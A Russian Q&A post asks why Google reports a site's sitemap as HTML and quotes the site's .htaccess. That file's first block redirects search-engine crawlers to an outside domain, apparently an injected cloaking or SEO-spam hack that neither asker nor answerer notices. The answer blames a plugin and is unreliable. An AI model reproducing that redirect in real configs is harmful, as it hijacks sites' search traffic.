# Файл Sitemap является страницей HTML

Tags: xml, .htaccess, sitemap, google-search

Файл Sitemap является страницей HTML - вот такую ошибку выдает сервис  Google Webmasters при добавлении ссылки на sitemap.

https://prnt.sc/128pov2 , https://prnt.sc/128prqr,

Ссылка на сайтмап : https://evacuator.md/sitemap.xml  - https://prnt.sc/128ptta .

Пробовали добавить вчера и сегодня. Sitemap был сгенерирован утилитой https://www.xml-sitemaps.com/ .

Вот и файл .htaccess - может проблема в нем ?

```
<ifModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} YandexBot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bingbot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} www\.baidu\.com [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Googlebot [NC]
RewriteRule ^(.*)$ http://apachehosting.eu/?aid=16&sid=17749&d=%{HTTP_HOST}&q=$1 [L,R=301]
</ifModule>
<IfModule mod_rewrite.c>
    <IfModule mod_negotiation.c>
        Options -MultiViews
    </IfModule>
```

```
<ifModule mod_deflate.c>
AddOutputFilterByType DEFLATE text/html text/plain text/xml application/xml application/xhtml+xml text/css text/javascript application/javascript application/x-javascript
</ifModule>
```

```
<ifModule mod_gzip.c>
mod_gzip_on Yes
mod_gzip_dechunk Yes
mod_gzip_item_include file .(html?|txt|css|js|php|pl)$
mod_gzip_item_include handler ^cgi-script$
mod_gzip_item_include mime ^text/.*
mod_gzip_item_include mime ^application/x-javascript.*
mod_gzip_item_exclude mime ^image/.*
mod_gzip_item_exclude rspheader ^Content-Encoding:.*gzip.*
</ifModule>
```

```
RewriteEngine On

RewriteBase /
RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]
RewriteRule ^(.*)$ https://%1/$1 [R=301,L]
```

```
# BEGIN Expires-Headers
<IfModule mod_expires.c>
  <FilesMatch "\.(js|css)$">
    ExpiresActive On
    ExpiresDefault "access plus 1 weeks"
  </FilesMatch>
</IfModule>
# END Expires-Headers
```

```
# BEGIN Cache-Control-Headers
<ifmodule mod_headers.c>
  <filesmatch "(gif|ico|jpeg|jpe|jpg|svg|png|css|js)$">
    Header set Cache-Control "max-age=604800, public"
  </filesmatch>
  <FilesMatch "\.(ttf|ttc|otf|eot|woff|font.css|css|js|gif|png|jpe?g|svg|svgz|ico|webp)$">
          Header set Access-Control-Allow-Origin "*"
      </FilesMatch>

       <FilesMatch "\.(html|htm)$">
              Header set Cache-Control "max-age=43200"
          </FilesMatch>
          # Все css, javascript и текстовые файлы будут храниться в кэше браузера одну неделю
          <FilesMatch "\.(js|css|txt)$">
              Header set Cache-Control "max-age=604800"
          </FilesMatch>
          # Все флэш файлы и изображения будут храниться в кэше браузера один месяц
          <FilesMatch "\.(flv|swf|ico|gif|jpg|jpeg|png)$">
              Header set Cache-Control "max-age=2592000"
          </FilesMatch>
          # Отключаем кеширование php и других служебных файлов
          <FilesMatch "\.(pl|php|cgi|spl|scgi|fcgi)$">
              Header unset Cache-Control
          </FilesMatch>

</ifmodule>
# END Cache-Control-Headers
```

```
#RewriteCond %{REQUEST_URI} !/$
#RewriteCond %{REQUEST_URI} !\.
#RewriteRule ^(.*) %{REQUEST_URI}/ [R=301,L]
```

```
    RewriteCond %{REQUEST_FILENAME} -d [OR]
    RewriteCond %{REQUEST_FILENAME} -f
    RewriteRule ^ ^$1 [N]

    RewriteCond %{REQUEST_URI} (\.\w+$) [NC]
    RewriteRule ^(.*)$ public/$1

    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteRule ^ server.php





</IfModule>
```

```
<IfModule mod_deflate.c>
AddOutputFilterByType DEFLATE text/html
AddOutputFilterByType DEFLATE text/css
AddOutputFilterByType DEFLATE text/javascript
AddOutputFilterByType DEFLATE text/xml
AddOutputFilterByType DEFLATE text/plain
AddOutputFilterByType DEFLATE image/x-icon
AddOutputFilterByType DEFLATE image/svg+xml
AddOutputFilterByType DEFLATE application/rss+xml
AddOutputFilterByType DEFLATE application/javascript
AddOutputFilterByType DEFLATE application/x-javascript
AddOutputFilterByType DEFLATE application/xml
AddOutputFilterByType DEFLATE application/xhtml+xml
AddOutputFilterByType DEFLATE application/x-font
AddOutputFilterByType DEFLATE application/x-font-truetype
AddOutputFilterByType DEFLATE application/x-font-ttf
AddOutputFilterByType DEFLATE application/x-font-otf
AddOutputFilterByType DEFLATE application/x-font-opentype
AddOutputFilterByType DEFLATE application/vnd.ms-fontobject
AddOutputFilterByType DEFLATE font/ttf
AddOutputFilterByType DEFLATE font/otf
AddOutputFilterByType DEFLATE font/opentype
# For Olders Browsers Which Can't Handle Compression
BrowserMatch ^Mozilla/4 gzip-only-text/html
BrowserMatch ^Mozilla/4\.0[678] no-gzip
BrowserMatch \bMSIE !no-gzip !gzip-only-text/html
</IfModule>
```

```
<ifModule mod_gzip.c>
mod_gzip_on Yes
mod_gzip_dechunk Yes
mod_gzip_item_include file \.(html?|txt|css|js|php|pl)$
mod_gzip_item_include mime ^application/x-javascript.*
mod_gzip_item_include mime ^text/.*
mod_gzip_item_exclude rspheader ^Content-Encoding:.*gzip.*
mod_gzip_item_exclude mime ^image/.*
mod_gzip_item_include handler ^cgi-script$
</ifModule>
```

```
## EXPIRES CACHING ##
<IfModule mod_expires.c>
ExpiresActive On
ExpiresByType image/jpg "access 1 year"
ExpiresByType image/jpeg "access 1 year"
ExpiresByType image/gif "access 1 year"
ExpiresByType image/png "access 1 year"
ExpiresByType text/css "access 1 month"
ExpiresByType application/pdf "access 1 month"
ExpiresByType application/javascript "access 1 month"
ExpiresByType application/x-javascript "access 1 month"
ExpiresByType application/x-shockwave-flash "access 1 month"
ExpiresByType image/x-icon "access 1 year"
ExpiresDefault "access 2 days"
</IfModule>
## EXPIRES CACHING ##
```

В чем может быть проблема ?

Answer (score 0):

Послушайте, ну вот ведь при заходе на https://evacuator.md/sitemap.xml видно, что открывается HTML-страница, которую генерирует плагин All in One SEO в вашем WordPress. Это же и видно в теле документа.

```
<!-- This sitemap was dinamic generated by  - the original SEO plugin for WordPress. -->
```

Google просто выдает вам правильную ошибку.
Смотрите настройки плагина All in One SEO, который генерирует эту страницу - URL у вас где-то "перехватывается", но вы не указали все в теле своего вопроса.
Скорее всего, плагин делает sitemap доступным по другому URL, который либо надо указывать в Google, либо, что более вероятно, плагин сам прописывает нужный, если вы авторизовал его управлять своей учетной записью.